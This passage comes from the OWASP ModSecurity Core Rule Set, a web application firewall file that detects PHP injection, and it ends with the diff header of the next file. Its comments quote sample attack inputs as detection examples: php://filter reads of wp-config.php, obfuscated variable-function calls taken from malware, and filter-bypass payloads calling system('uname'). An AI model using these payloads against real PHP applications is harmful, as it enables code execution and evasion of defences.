setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
#
# [ PHP Configuration Directives ]
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFile php-config-directives.data" \
"id:933120,\
phase:2,\
block,\
capture,\
t:none,t:urlDecodeUni,t:normalisePath,t:lowercase,\
msg:'PHP Injection Attack: Configuration Directive Found',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-php',\
tag:'platform-multi',\
tag:'attack-injection-php',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
chain"
SecRule MATCHED_VARS "@pm =" \
"capture,\
setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
#
# [ PHP Variables ]
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFile php-variables.data" \
"id:933130,\
phase:2,\
block,\
capture,\
t:none,t:normalisePath,t:urlDecodeUni,t:lowercase,\
msg:'PHP Injection Attack: Variables Found',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-php',\
tag:'platform-multi',\
tag:'attack-injection-php',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
#
# [ PHP I/O Streams ]
#
# The "php://" syntax can be used to refer to various objects, such as local files (for LFI),
# remote urls (for RFI), or standard input/request body. Its occurrence indicates a possible attempt
# to either inject PHP code or exploit a file inclusion vulnerability in a PHP web app.
#
# Examples:
# php://filter/resource=./../../../wp-config.php
# php://filter/resource=http://www.example.com
# php://stdin
# php://input
#
# http://php.net/manual/en/wrappers.php.php
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)php://(?:std(?:in|out|err)|(?:in|out)put|fd|memory|temp|filter)" \
"id:933140,\
phase:2,\
block,\
capture,\
t:none,\
msg:'PHP Injection Attack: I/O Stream Found',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-php',\
tag:'platform-multi',\
tag:'attack-injection-php',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
#
# [ PHP Wrappers ]
#
# PHP comes with many built-in wrappers for various URL-style protocols for use with the filesystem
# functions such as fopen(), copy(), file_exists() and filesize(). Abusing of PHP wrappers like phar://
# could lead to RCE as describled by Sam Thomas at BlackHat USA 2018 (https://bit.ly/2yaKV5X), even
# wrappers like zlib://, glob://, rar://, zip://, etc... could lead to LFI and expect:// to RCE.
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:zlib|glob|phar|ssh2|rar|ogg|expect|zip)://" \
"id:933200,\
phase:2,\
block,\
t:none,t:utf8toUnicode,t:urlDecodeUni,t:removeNulls,t:cmdLine,\
msg:'PHP Injection Attack: Wrapper scheme detected',\
logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\
tag:'application-multi',\
tag:'language-php',\
tag:'platform-multi',\
tag:'attack-injection-php',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
#
# [ PHP Functions ]
#
# Detecting PHP function names is useful to block PHP code injection attacks.
# There are many PHP functions. We have to strike a balance between robust detection
# of PHP code in content, and the risk of false positives.
#
# The list of PHP functions is divided into four groups of varying attack/false positive risk.
# Four separate rules are used to detect these groups of functions:
#
# - Rule 933150: ~40 words highly common to PHP injection payloads and extremely rare in
# natural language or other contexts.
# Examples: 'base64_decode', 'file_get_contents'.
# These words are detected as a match directly using @pmFromFile.
# Function names are defined in php-function-names-933150.data
#
# - Rule 933160: ~220 words which are common in PHP code, but have a higher chance to cause
# false positives in natural language or other contexts.
# Examples: 'chr', 'eval'.
# To mitigate false positives, a regexp looks for PHP function syntax, e.g. 'eval()'.
# Regexp is generated from function names in util/regexp-assemble/regexp-933160.data
#
# - Rule 933151: ~1300 words of lesser importance. This includes most PHP functions and keywords.
# Examples: 'addslashes', 'array_diff'.
# For performance reasons, the @pmFromFile operator is used, and many functions from lesser
# used PHP extensions are removed.
# To mitigate false positives, we only match when the '(' character is also found.
# This rule only runs in paranoia level 2 or higher.
# Function names are defined in php-function-names-933151.data
#
# - Rule 933161: ~200 words with short or trivial names, possibly leading to false positives.
# Examples: 'abs', 'cos'.
# To mitigate false positives, a regexp matches on function syntax, e.g. 'abs()'.
# This rule only runs in paranoia level 3 or higher.
# Regexp is generated from function names in util/regexp-assemble/regexp-933161.data
#
#
# [ PHP Functions: High-Risk PHP Function Names ]
#
# Rule 933150 contains a small list of function names which are highly indicative of a PHP
# injection attack, for example 'base64_decode'.
# We block these function names outright, without using a complex regexp or chain.
# This could make the detection a bit more robust against possible bypasses.
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@pmFromFile php-function-names-933150.data" \
"id:933150,\
phase:2,\
block,\
capture,\
t:none,t:lowercase,\
msg:'PHP Injection Attack: High-Risk PHP Function Name Found',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-php',\
tag:'platform-multi',\
tag:'attack-injection-php',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
#
# [ PHP Functions: High-Risk PHP Function Calls ]
#
# Some PHP function names have a certain risk of false positives, due to short
# names, full or partial overlap with common natural language terms, uses in
# other contexts, et cetera. Some examples are 'eval', 'exec', 'system'.
#
# For these function names, we apply a regexp to look for PHP function syntax.
# The regexp looks for a word boundary and adjoining parentheses.
# For instance, we want to block 'eval()', but we want to allow 'medieval()'.
#
# We have to be careful of possible bypasses using comment syntax. Examples:
#
# system(...)
# system (...)
# system\t(...)
# system /*comment*/ (...)
# system /*multiline \n comment*/ (...)
# system //comment \n (...)
# system #comment \n (...)
#
# This rule is also triggered by the following exploit(s):
# [ Apache Struts vulnerability CVE-2017-9791 - Exploit tested: https://www.exploit-db.com/exploits/42324 ]
# [ Apache Struts vulnerability CVE-2018-11776 - Exploit tested: https://www.exploit-db.com/exploits/45260 ]
# [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ]
#
# Regexp generated from util/regexp-assemble/regexp-933160.data using Regexp::Assemble.
# See https://coreruleset.org/20190826/optimizing-regular-expressions/ for usage.
#
# Note that after assemble, PHP function syntax pre/postfix is added to the Regexp::Assemble
# output. Example: "@rx (?i)\bASSEMBLE_OUTPUT_HERE(?:\s|/\*.*\*/|//.*|#.*)*\(.*\)"
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:s(?:e(?:t(?:_(?:e(?:xception|rror)_handler|magic_quotes_runtime|include_path)|defaultstub)|ssion_s(?:et_save_handler|tart))|qlite_(?:(?:(?:unbuffered|single|array)_)?query|create_(?:aggregate|function)|p?open|exec)|tr(?:eam_(?:context_create|socket_client)|ipc?slashes|rev)|implexml_load_(?:string|file)|ocket_c(?:onnect|reate)|h(?:ow_sourc|a1_fil)e|pl_autoload_register|ystem)|p(?:r(?:eg_(?:replace(?:_callback(?:_array)?)?|match(?:_all)?|split)|oc_(?:(?:terminat|clos|nic)e|get_status|open)|int_r)|o(?:six_(?:get(?:(?:e[gu]|g)id|login|pwnam)|mk(?:fifo|nod)|ttyname|kill)|pen)|hp(?:_(?:strip_whitespac|unam)e|version|info)|g_(?:(?:execut|prepar)e|connect|query)|a(?:rse_(?:ini_file|str)|ssthru)|utenv)|r(?:unkit_(?:function_(?:re(?:defin|nam)e|copy|add)|method_(?:re(?:defin|nam)e|copy|add)|constant_(?:redefine|add))|e(?:(?:gister_(?:shutdown|tick)|name)_function|ad(?:(?:gz)?file|_exif_data|dir))|awurl(?:de|en)code)|i(?:mage(?:createfrom(?:(?:jpe|pn)g|x[bp]m|wbmp|gif)|(?:jpe|pn)g|g(?:d2?|if)|2?wbmp|xbm)|s_(?:(?:(?:execut|write?|read)ab|fi)le|dir)|ni_(?:get(?:_all)?|set)|terator_apply|ptcembed)|g(?:et(?:_(?:c(?:urrent_use|fg_va)r|meta_tags)|my(?:[gpu]id|inode)|(?:lastmo|cw)d|imagesize|env)|z(?:(?:(?:defla|wri)t|encod|fil)e|compress|open|read)|lob)|a(?:rray_(?:u(?:intersect(?:_u?assoc)?|diff(?:_u?assoc)?)|intersect_u(?:assoc|key)|diff_u(?:assoc|key)|filter|reduce|map)|ssert(?:_options)?)|h(?:tml(?:specialchars(?:_decode)?|_entity_decode|entities)|(?:ash(?:_(?:update|hmac))?|ighlight)_file|e(?:ader_register_callback|x2bin))|f(?:i(?:le(?:(?:[acm]tim|inod)e|(?:_exist|perm)s|group)?|nfo_open)|tp_(?:nb_(?:ge|pu)|connec|ge|pu)t|(?:unction_exis|pu)ts|write|open)|o(?:b_(?:get_(?:c(?:ontents|lean)|flush)|end_(?:clean|flush)|clean|flush|start)|dbc_(?:result(?:_all)?|exec(?:ute)?|connect)|pendir)|m(?:b_(?:ereg(?:_(?:replace(?:_callback)?|match)|i(?:_replace)?)?|parse_str)|(?:ove_uploaded|d5)_file|ethod_exists|ysql_query|kdir)|e(?:x(?:if_(?:t(?:humbnail|agname)|imagetype|read_data)|ec)|scapeshell(?:arg|cmd)|rror_reporting|val)|c(?:url_(?:file_create|exec|init)|onvert_uuencode|reate_function|hr)|u(?:n(?:serialize|pack)|rl(?:de|en)code|[ak]?sort)|(?:json_(?:de|en)cod|debug_backtrac|tmpfil)e|b(?:(?:son_(?:de|en)|ase64_en)code|zopen)|var_dump)(?:\s|/\*.*\*/|//.*|#.*)*\(.*\)" \
"id:933160,\
phase:2,\
block,\
capture,\
t:none,\
msg:'PHP Injection Attack: High-Risk PHP Function Call Found',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-php',\
tag:'platform-multi',\
tag:'attack-injection-php',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
#
# [ PHP Object Injection ]
#
# PHP Object Injection is an application level vulnerability that could allow
# an attacker to perform different kinds of malicious attacks, such as
# Code Injection, SQL Injection, Path Traversal and Application Denial of Service,
# depending on the context.
#
# The vulnerability occurs when user-supplied input is not properly sanitized
# before being passed to the unserialize() PHP function. Since PHP allows object
# serialization, attackers could pass ad-hoc serialized strings to a vulnerable
# unserialize() call, resulting in an arbitrary PHP object(s) injection into the
# application scope.
#
# https://www.owasp.org/index.php/PHP_Object_Injection
#
# In serialized form, PHP objects have the following format:
#
# O:8:"stdClass":1:{s:1:"a";i:2;}
# O:3:"Foo":0:{}
#
# Also detected are PHP objects with a custom unserializer:
# http://www.phpinternalsbook.com/classes_objects/serialization.html
# These have the following format:
#
# C:11:"ArrayObject":37:{x:i:0;a:1:{s:1:"a";s:1:"b";};m:a:0:{}}
# C:3:"Foo":23:{s:15:"My private data";}
#
# HTTP headers are inspected, since PHP object injection vulnerabilities have been
# found in applications parsing them:
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8562 (User-Agent header)
# https://www.exploit-db.com/exploits/39033/ (X-Forwarded-For header)
# http://karmainsecurity.com/KIS-2015-10 (Host header)
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS|ARGS_NAMES|ARGS|XML:/* "@rx [oOcC]:\d+:\".+?\":\d+:{.*}" \
"id:933170,\
phase:2,\
block,\
capture,\
t:none,\
msg:'PHP Injection Attack: Serialized Object Injection',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-php',\
tag:'platform-multi',\
tag:'attack-injection-php',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
#
# [ PHP Functions: Variable Function Calls ]
#
# PHP 'variable functions' provide an alternate syntax for calling PHP functions.
# http://php.net/manual/en/functions.variable-functions.php
#
# An attacker may use variable function syntax to evade detection of function
# names during exploitation of a remote code execution vulnerability.
# An example to use the 'file_get_contents' function while evading rule 933150:
#
# $fn = 'file_' . 'get_' . 'contents';
# echo $fn('wp-co' . 'nfig.php');
#
# Some examples from obfuscated malware:
#
# $OOO0000O0(...)
# @$b374k(...)
# $_[@-_]($_[@!+_] )
#
# A breakdown of the regular expression:
#
# \$+
# The variable's '$' char, or multiple '$' for 'variable variables':
# http://php.net/manual/en/language.variables.variable.php
# (?:[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*|\s*{.+})
# One of the following:
# - A variable name; regexp from http://php.net/language.variables.basics
# - A nonempty expression for variable variables: ${'fn'} or $ {'fn'}
# (?:\s|\[.+\]|{.+}|/\*.*\*/|//.*|#.*)*
# Optional whitespace, array access, or comments
# \(.*\)
# Parentheses optionally containing function parameters
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx \$+(?:[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*|\s*{.+})(?:\s|\[.+\]|{.+}|/\*.*\*/|//.*|#.*)*\(.*\)" \
"id:933180,\
phase:2,\
block,\
capture,\
t:none,\
msg:'PHP Injection Attack: Variable Function Call Found',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-php',\
tag:'platform-multi',\
tag:'attack-injection-php',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
# [ PHP Functions: Variable Function Prevent Bypass ]
#
# Referring to https://www.secjuice.com/php-rce-bypass-filters-sanitization-waf/
# the rule 933180 could be bypassed by using the following payloads:
#
# - (system)('uname')
# - (sy.(st).em)('uname')
# - (string)"system"('uname')
# - define('x', 'sys' . 'tem');(x)/* comment */('uname')
# - $y = 'sys'.'tem';($y)('uname')
# - define('z', [['sys' .'tem']]);(z)[0][0]('uname');
# - (system)(ls)
# - (/**/system)(ls/**/);
# - (['system'])[0]('uname');
# - (++[++system++][++0++])++{/*dsasd*/0}++(++ls++);
#
# This rule blocks all payloads above and avoids to block values like:
#
# - [ACME] this is a test (just a test)
# - Test (with two) rounded (brackets)
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?:(?:\(|\[)[a-zA-Z0-9_.$\"'\[\](){}/*\s]+(?:\)|\])[0-9_.$\"'\[\](){}/*\s]*\([a-zA-Z0-9_.$\"'\[\](){}/*\s].*\)|\([\s]*string[\s]*\)[\s]*(?:\"|'))" \
"id:933210,\
phase:2,\
block,\
capture,\
t:none,t:urlDecode,t:replaceComments,t:compressWhitespace,\
msg:'PHP Injection Attack: Variable Function Call Found',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-php',\
tag:'platform-multi',\
tag:'attack-injection-php',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:933013,phase:1,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:933014,phase:2,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
#
# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher)
#
#
# [ PHP Functions: Medium-Risk PHP Function Names ]
#
# In paranoia level 2, we add additional checks for most PHP functions.
#
# The size of the PHP function list is considerable.
# Even after excluding the more obscure PHP extensions, 1300+ functions remain.
# For performance and maintenance reasons, this rule does not use a regexp,
# but uses a phrase file (@pmFromFile), and additionally looks for an '(' character
# in the matched variable.
#
# This approach carries some risk for false positives. Therefore, the function list
# has been curated to remove words closely matching natural language and terms often
# used in other contexts.
#
# This rule is a stricter sibling of rule 933150.
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@pmFromFile php-function-names-933151.data" \
"id:933151,\
phase:2,\
block,\
capture,\
t:none,t:lowercase,\
msg:'PHP Injection Attack: Medium-Risk PHP Function Name Found',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-php',\
tag:'platform-multi',\
tag:'attack-injection-php',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242',\
tag:'paranoia-level/2',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
chain"
SecRule MATCHED_VARS "@pm (" \
"capture,\
setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:933015,phase:1,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:933016,phase:2,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
#
# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher)
#
#
# [ PHP Variables: Common Variable Indexes ]
#
# In paranoia level 3, we add additional checks for parameters to many PHP variables.
#
#
# One of the more common variables used within attacks on PHP is $_SERVER. Because
# of how many different ways PHP has for executing variables (variable variables,
# etc) often just looking for $_SERVER will be less effective than looking for the
# various indexes within $_SERVER. This rule checks for these indexes.
# This rule is located in PL 3 because often developers will use these names as
# parameter names or values and this will lead to false positives.
# Because this list is not expected to change and it is limited in size we use a
# regex in this case to look for these values whereas in its sibling rule we use
# @pmFromFile for flexibility and performance.
#
# To rebuild the regexp:
# cd util/regexp-assemble
# ./regexp-assemble.pl < regexp-933131.data
#
# This rule is a stricter sibling of rule 933130.
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:HTTP_(?:ACCEPT(?:_(?:ENCODING|LANGUAGE|CHARSET))?|(?:X_FORWARDED_FO|REFERE)R|(?:USER_AGEN|HOS)T|CONNECTION|KEEP_ALIVE)|PATH_(?:TRANSLATED|INFO)|ORIG_PATH_INFO|QUERY_STRING|REQUEST_URI|AUTH_TYPE)" \
"id:933131,\
phase:2,\
block,\
capture,\
t:none,t:normalisePath,t:urlDecodeUni,\
msg:'PHP Injection Attack: Variables Found',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-php',\
tag:'platform-multi',\
tag:'attack-injection-php',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242',\
tag:'paranoia-level/3',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
#
# [ PHP Functions: Low-Value PHP Function Calls ]
#
# In paranoia level 3, we add additional checks for the remaining PHP functions.
#
# Most of these function names are likely to cause false positives in natural text
# or common parameter values, such as 'abs', 'copy', 'date', 'key', 'max', 'min'.
# Therefore, these function names are not scanned in lower paranoia levels.
#
# To mitigate the risk of false positives somewhat, a regexp is used to look for
# PHP function syntax. (See rule 933160 for a description.)
#
# This rule is a stricter sibling of rule 933160.
#
# This rule is also triggered by the following exploit(s):
# [ Apache Struts vulnerability CVE-2018-11776 - Exploit tested: https://www.exploit-db.com/exploits/45262 ]
# [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ]
#
# Regexp generated from util/regexp-assemble/regexp-933161.data using Regexp::Assemble.
# See https://coreruleset.org/20190826/optimizing-regular-expressions/ for usage.
#
# Note that after assemble, PHP function syntax pre/postfix is added to the Regexp::Assemble
# output. Example: "@rx (?i)\bASSEMBLE_OUTPUT_HERE(?:\s|/\*.*\*/|//.*|#.*)*\(.*\)"
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:i(?:s(?:_(?:in(?:t(?:eger)?|finite)|n(?:u(?:meric|ll)|an)|(?:calla|dou)ble|s(?:calar|tring)|f(?:inite|loat)|re(?:source|al)|l(?:ink|ong)|a(?:rray)?|object|bool)|set)|n(?:(?:clud|vok)e|t(?:div|val))|(?:mplod|dat)e|conv)|s(?:t(?:r(?:(?:le|sp)n|coll)|at)|(?:e(?:rializ|ttyp)|huffl)e|i(?:milar_text|zeof|nh?)|p(?:liti?|rintf)|(?:candi|ubst)r|y(?:mlink|slog)|o(?:undex|rt)|leep|rand|qrt)|f(?:ile(?:(?:siz|typ)e|owner|pro)|l(?:o(?:atval|ck|or)|ush)|(?:rea|mo)d|t(?:ell|ok)|unction|close|gets|stat|eof)|c(?:h(?:o(?:wn|p)|eckdate|root|dir|mod)|o(?:(?:(?:nsta|u)n|mpac)t|sh?|py)|lose(?:dir|log)|(?:urren|ryp)t|eil)|e(?:x(?:(?:trac|i)t|p(?:lode)?)|a(?:ster_da(?:te|ys)|ch)|r(?:ror_log|egi?)|mpty|cho|nd)|l(?:o(?:g(?:1[0p])?|caltime)|i(?:nk(?:info)?|st)|(?:cfirs|sta)t|evenshtein|trim)|d(?:i(?:(?:skfreespac)?e|r(?:name)?)|e(?:fined?|coct)|(?:oubleva)?l|ate)|r(?:e(?:(?:quir|cod|nam)e|adlin[ek]|wind|set)|an(?:ge|d)|ound|sort|trim)|m(?:b(?:split|ereg)|i(?:crotime|n)|a(?:i[ln]|x)|etaphone|y?sql|hash)|u(?:n(?:(?:tain|se)t|iqid|link)|s(?:leep|ort)|cfirst|mask)|a(?:s(?:(?:se|o)rt|inh?)|r(?:sort|ray)|tan[2h]?|cosh?|bs)|t(?:e(?:xtdomain|mpnam)|a(?:int|nh?)|ouch|ime|rim)|h(?:e(?:ader(?:s_(?:lis|sen)t)?|brev)|ypot|ash)|p(?:a(?:thinfo|ck)|r(?:intf?|ev)|close|o[sw]|i)|g(?:et(?:t(?:ext|ype)|date)|mdate)|o(?:penlog|ctdec|rd)|b(?:asename|indec)|n(?:atsor|ex)t|k(?:sort|ey)|quotemeta|wordwrap|virtual|join)(?:\s|/\*.*\*/|//.*|#.*)*\(.*\)" \
"id:933161,\
phase:2,\
block,\
capture,\
t:none,\
msg:'PHP Injection Attack: Low-Value PHP Function Call Found',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-php',\
tag:'platform-multi',\
tag:'attack-injection-php',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242',\
tag:'paranoia-level/3',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
#
# [ PHP Script Uploads: Superfluous extension ]
#
# Block file uploads with PHP related extensions (.php, .phps, .phtml,
# .php5 etc) anywhere in the name, followed by a dot.
#
# Example: index.php.tmp
#
# Uploading of such files can lead to remote code execution if
# Apache is configured with AddType and MultiViews, as Apache will
# automatically do a filename match when the extension is unknown.
# This configuration is fortunately not common in modern installs.
#
# Blocking these file names might lead to more false positives.
#
# Some AJAX uploaders use the nonstandard request headers X-Filename,
# X_Filename, or X-File-Name to transmit the file name to the server;
# scan these request headers as well as multipart/form-data file names.
#
# This rule is a stricter sibling of rule 933110.
#
SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEADERS:X.Filename|REQUEST_HEADERS:X-File-Name "@rx .*\.(?:php\d*|phtml)\..*$" \
"id:933111,\
phase:2,\
block,\
capture,\
t:none,t:lowercase,\
msg:'PHP Injection Attack: PHP Script File Upload Found',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-php',\
tag:'platform-multi',\
tag:'attack-injection-php',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242',\
tag:'paranoia-level/3',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
# [ PHP Closing Tag Found ]
#
# http://www.php.net/manual/en/language.basic-syntax.phptags.php
#
# This check was extracted from 933100 (paranoia level 1), since the
# checked sequence '?>' commonly causes false positives.
# See issue #654 for discussion.
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pm ?>" \
"id:933190,\
phase:2,\
block,\
capture,\
t:none,t:urlDecodeUni,\
msg:'PHP Injection Attack: PHP Closing Tag Found',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-php',\
tag:'platform-multi',\
tag:'attack-injection-php',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242',\
tag:'paranoia-level/3',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:933017,phase:1,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:933018,phase:2,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
#
# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher)
#
#
# -= Paranoia Levels Finished =-
#
SecMarker "END-REQUEST-933-APPLICATION-ATTACK-PHP"

95
core/modsecurity/files/coreruleset/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf Normal file
View File

@@ -0,0 +1,95 @@
# ------------------------------------------------------------------------
# OWASP ModSecurity Core Rule Set ver.3.3.2
# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
